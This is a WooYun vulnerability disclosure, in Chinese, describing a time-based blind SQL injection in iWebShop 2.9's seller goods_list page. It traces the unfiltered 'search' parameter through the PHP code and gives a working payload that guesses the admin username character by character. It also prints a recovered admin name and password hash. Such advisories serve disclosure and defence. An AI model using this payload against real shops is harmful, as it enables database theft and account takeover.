当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093637

漏洞标题:Iwebshop最新版注入又一枚

相关厂商:Jooyea

漏洞作者: 路人甲

提交时间:2015-01-28 16:49

修复时间:2015-04-28 16:50

公开时间:2015-04-28 16:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Iwebshop最新版注入又一枚

详细说明:

看到wooyun上有人提了几个iweshop(2014-11-18更新)的漏洞( WooYun: iWebShop开源电子商务系统SQL注入漏洞 ),去官网看了看,在2014-12-16 已更新到了 iwebshop2.9.14121000,下下来研究研究,希望不要重复。
注入一枚:POST /index.php?controller=seller&action=goods_list这个注入藏的相对比较深,在HTML文件中。POST参数中的search作为一个数组传入,search的KEY and VALUE 都过滤不完全,注入成功,文件在/controllers/seller.php的goods_list()方法中
看看代码/controllers/seller.php

//商品列表
public function goods_list()
{
$this->redirect('goods_list');
}


这段代码看似直接重向了,并没有什么参数传入,注入点在哪里呢?
然后各种跳跳跳,最后一直跟到/views/sysseller/seller/goods_list.html

{set:$seller_id = $this->seller['seller_id']}
{set:$page = IReq::get('page') ? IFilter::act(IReq::get('page'),'int') : 1}
{set:$condition = IReq::get('search');$where = '';$searchUrl='';}
{if:$condition}
{foreach:items=$condition}
{set:$searchUrl .='&search['.urlencode($key).']='.urlencode($item)}
{if:$item !== ""}
{if:$key == "go.store_nums"}
{set:$where .= ' and '.$key.$item}
{else:}
{set:$where .= ' and '.$key.'"'.$item.'"'}
{/if}
{/if}
{/foreach}
{/if}


condition是这样获得的$condition = IReq::get('search');,去看看IReq::get
/lib/core/util/req_class.php

public static function get($key, $type=false)
{
//默认方式
if($type==false)
{
if(isset($_GET[$key])) return $_GET[$key];
else if(isset($_POST[$key])) return $_POST[$key];
else return null;
}
//get方式
else if($type=='get' && isset($_GET[$key]))
return $_GET[$key];
//post方式
else if($type=='post' && isset($_POST[$key]))
return $_POST[$key];
//无匹配
else
return null;
}


没有经过任何处理,直接把GET、POST的内容传入了
测试方法:申请开店后,登录,添加一件商品,然后发送下面的post包即可。
Payload:POST提交

search[1%3d-1/**/or(select/**/if(ord(mid((select/**/admin_name/**/from/**/iwebshop_admin/**/limit
/**/0,1),1,1))%3d97,sleep(1),0))#]=test_goods_list


因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,延迟1s左右,如下图

猜测失败副本.jpg


若正确,延迟4s左右(与你添加的商品数量有关,可以只给自己的店铺添加一件商品)如下图

猜测成功副本.jpg


按上面的方法依次做下去(burp intruder或者自己写个脚本跑),可测试管理员用户名为:admin,密码为: f6fdffe48c908deb0f4c3bd36c032e72

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论